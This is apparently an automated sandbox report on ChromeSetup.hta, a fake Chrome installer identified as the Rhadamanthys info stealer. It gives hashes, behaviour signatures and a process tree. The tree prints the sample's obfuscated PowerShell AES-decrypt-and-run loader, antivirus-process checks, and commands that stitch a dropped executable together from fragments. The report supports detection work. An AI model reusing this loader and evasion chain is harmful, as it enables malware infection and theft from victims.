Analysis
  max time kernel: 1199s
  max time network: 883s
  platform: windows10-1703_x64
  resource: win10-20240221-en
  resource tags: arch:x64, arch:x86, image:win10-20240221-en, locale:en-us, os:windows10-1703-x64, system
  submitted: 28-03-2024 03:03

  Static task: static1
  Behavioral task: behavioral1 (Sample: ChromeSetup.hta, Resource: win10-20240221-en)
  Behavioral task: behavioral2 (Sample: ChromeSetup.hta, Resource: win10v2004-20240319-en)
  Behavioral task: behavioral3 (Sample: ChromeSetup.hta, Resource: win11-20240221-en)

General
  Target: ChromeSetup.hta
  Size: 140KB
  MD5: d92c49ca712a0503de3e182f66e3dcba
  SHA1: 97f716142447128859561a75e4677f978aca7fad
  SHA256: 908ca27ec447937b2f97fd4053a8fea99f45bc7e2eb028152f2301c97f952acf
  SHA512: fdc26a2aa4f935286f77d04538bef4e7d0a3f99fec2a85544b5ab086ba1ab0fa758332f4aea26ea5f7e57f4bdb30854d64fd760e38d2bc2b31b414a97392b4e1
  SSDEEP: 768:p+/unhi1zOzZ+/unhi1zOzpBG3uJ1zxTg+/unhi1zOzxM+/unhi1zOz:pti5OzZti5OzpB91tgti5Ozati5Oz
Malware Config
Signatures
Rhadamanthys
  Rhadamanthys is an info stealer written in C++ first seen in August 2022.
Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
  Processes:
    description            pid   Process        procid_target
    PID 4312 created 3112  4312  Donations.pif  50
Blocklisted process makes network request (2 IoCs)
  Processes:
    flow  pid   Process
    2     4088  powershell.exe
    5     4088  powershell.exe
Downloads MZ/PE file
Executes dropped EXE (2 IoCs)
  Processes:
    pid   Process
    1272  ChromeSetup.exe
    4312  Donations.pif
Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
Program crash (1 IoC)
  Processes:
    pid   pid_target  Process       procid_target
    3388  4312        WerFault.exe  93
Checks processor information in registry (2 TTPs, 2 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes:
    description        ioc                                                                    Process
    Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0       AcroRd32.exe
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz  AcroRd32.exe
Enumerates processes with tasklist (1 TTP, 2 IoCs)
  Processes:
    pid   Process
    676   tasklist.exe
    4044  tasklist.exe
Modifies Internet Explorer settings
  Processes:
    description  ioc                                                                                                                                          Process
    Key created  \REGISTRY\USER\S-1-5-21-313240725-3527728709-4038673254-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION  AcroRd32.exe
Modifies registry class (1 IoC)
  Processes:
    description  ioc                                                                       Process
    Key created  \REGISTRY\USER\S-1-5-21-313240725-3527728709-4038673254-1000_Classes\Local Settings  powershell.exe
Runs ping.exe (1 TTP, 1 IoC)
Suspicious behavior: EnumeratesProcesses (35 IoCs)
  Processes (identical rows shown once, with their count):
    pid   Process         count
    4088  powershell.exe  3
    4312  Donations.pif   6
    484   AcroRd32.exe    20
    4312  Donations.pif   2
    1244  dialer.exe      4
Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes:
    description              pid   Process
    Token: SeDebugPrivilege  4088  powershell.exe
    Token: SeDebugPrivilege  676   tasklist.exe
    Token: SeDebugPrivilege  4044  tasklist.exe
Suspicious use of FindShellTrayWindow (4 IoCs)
  Processes (identical rows shown once, with their count):
    pid   Process        count
    484   AcroRd32.exe   1
    4312  Donations.pif  3
Suspicious use of SendNotifyMessage (3 IoCs)
  Processes (identical rows shown once, with their count):
    pid   Process        count
    4312  Donations.pif  3
Suspicious use of SetWindowsHookEx (5 IoCs)
  Processes (identical rows shown once, with their count):
    pid  Process       count
    484  AcroRd32.exe  5
Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (identical rows shown once, with their count):
    description                       pid   Process          procid_target  count
    PID 4416 wrote to memory of 4088  4416  mshta.exe        72             3
    PID 4088 wrote to memory of 484   4088  powershell.exe   74             3
    PID 4088 wrote to memory of 1272  4088  powershell.exe   75             3
    PID 1272 wrote to memory of 3692  1272  ChromeSetup.exe  77             3
    PID 484 wrote to memory of 1036   484   AcroRd32.exe     76             3
    PID 1036 wrote to memory of 1396  1036  RdrCEF.exe       79             41
    PID 1036 wrote to memory of 4084  1036  RdrCEF.exe       80             8
Processes (process tree; the leading number is the depth in the tree)

1. c:\windows\system32\sihost.exe
   Command: sihost.exe
   PID: 3112
   2. C:\Windows\SysWOW64\dialer.exe
      Command: "C:\Windows\system32\dialer.exe"
      PID: 1244
      - Suspicious behavior: EnumeratesProcesses

1. C:\Windows\SysWOW64\mshta.exe
   Command: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\ChromeSetup.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
   PID: 4416
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function TLcToxJS($Imjw){return -split ($Imjw -replace '..', '0x$& ')};$eGLbfA = TLcTox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xBQDa = [System.Security.Cryptography.Aes]::Create();$xBQDa.Key = TLcToxJS('466371524D774563634159445A6A426E');$xBQDa.IV = New-Object byte[] 16;$PuTlXHvG = $xBQDa.CreateDecryptor();$BgiNlDJqW = $PuTlXHvG.TransformFinalBlock($eGLbfA, 0, $eGLbfA.Length);$HxMgCSafi = [System.Text.Encoding]::Utf8.GetString($BgiNlDJqW);$PuTlXHvG.Dispose();& $HxMgCSafi.Substring(0,3) $HxMgCSafi.Substring(3)
      PID: 4088
      - Blocklisted process makes network request
      - Modifies registry class
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      3. C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
         Command: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\sample.pdf"
         PID: 484
         - Checks processor information in registry
         - Modifies Internet Explorer settings
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of FindShellTrayWindow
         - Suspicious use of SetWindowsHookEx
         - Suspicious use of WriteProcessMemory
         4. C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
            Command: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
            PID: 1036
            - Suspicious use of WriteProcessMemory
            5. C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
               Command: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=36D70632AA851B14B1421659DEBD8B5C --mojo-platform-channel-handle=1612 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
               PID: 1396
            5. C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
               Command: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=C077458945434E8DCFED89F002513B1F --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=C077458945434E8DCFED89F002513B1F --renderer-client-id=2 --mojo-platform-channel-handle=1624 --allow-no-sandbox-job /prefetch:1
               PID: 4084
            5. C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
               Command: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=233ED1007F039B36D6EB8288D353A82F --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=233ED1007F039B36D6EB8288D353A82F --renderer-client-id=4 --mojo-platform-channel-handle=2212 --allow-no-sandbox-job /prefetch:1
               PID: 1616
            5. C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
               Command: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D5A56533E4261D4CEAC64607455EC515 --mojo-platform-channel-handle=2592 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
               PID: 4940
            5. C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
               Command: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=9BAF8A1DF7A0F5A6C6E189D836DCAE4B --mojo-platform-channel-handle=1820 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
               PID: 4292
            5. C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
               Command: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=DE6FACF4065766378474D72FA6A13CB6 --mojo-platform-channel-handle=2664 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
               PID: 2360
      3. C:\Users\Admin\AppData\Roaming\ChromeSetup.exe
         Command: "C:\Users\Admin\AppData\Roaming\ChromeSetup.exe"
         PID: 1272
         - Executes dropped EXE
         - Suspicious use of WriteProcessMemory
         4. C:\Windows\SysWOW64\cmd.exe
            Command: "C:\Windows\System32\cmd.exe" /k move Bathrooms Bathrooms.bat & Bathrooms.bat & exit
            PID: 3692
            5. C:\Windows\SysWOW64\tasklist.exe
               Command: tasklist
               PID: 676
               - Enumerates processes with tasklist
               - Suspicious use of AdjustPrivilegeToken
            5. C:\Windows\SysWOW64\findstr.exe
               Command: findstr /I "wrsa.exe opssvc.exe"
               PID: 2368
            5. C:\Windows\SysWOW64\tasklist.exe
               Command: tasklist
               PID: 4044
               - Enumerates processes with tasklist
               - Suspicious use of AdjustPrivilegeToken
            5. C:\Windows\SysWOW64\findstr.exe
               Command: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
               PID: 3372
            5. C:\Windows\SysWOW64\cmd.exe
               Command: cmd /c md 13137
               PID: 2764
            5. C:\Windows\SysWOW64\cmd.exe
               Command: cmd /c copy /b Compound + Injection + Emotions + Worm + Participants 13137\Donations.pif
               PID: 3172
            5. C:\Windows\SysWOW64\cmd.exe
               Command: cmd /c copy /b Src + Expressions + Safari + Treasury 13137\x
               PID: 4100
            5. C:\Users\Admin\AppData\Local\Temp\13137\Donations.pif
               Command: 13137\Donations.pif 13137\x
               PID: 4312
               - Suspicious use of NtCreateUserProcessOtherParentProcess
               - Executes dropped EXE
               - Suspicious behavior: EnumeratesProcesses
               - Suspicious use of FindShellTrayWindow
               - Suspicious use of SendNotifyMessage
               6. C:\Windows\SysWOW64\WerFault.exe
                  Command: C:\Windows\SysWOW64\WerFault.exe -u -p 4312 -s 820
                  PID: 3388
                  - Program crash
            5. C:\Windows\SysWOW64\PING.EXE
               Command: ping -n 5 127.0.0.1
               PID: 1808
               - Runs ping.exe
Network
MITRE ATT&CK Enterprise v15
Downloads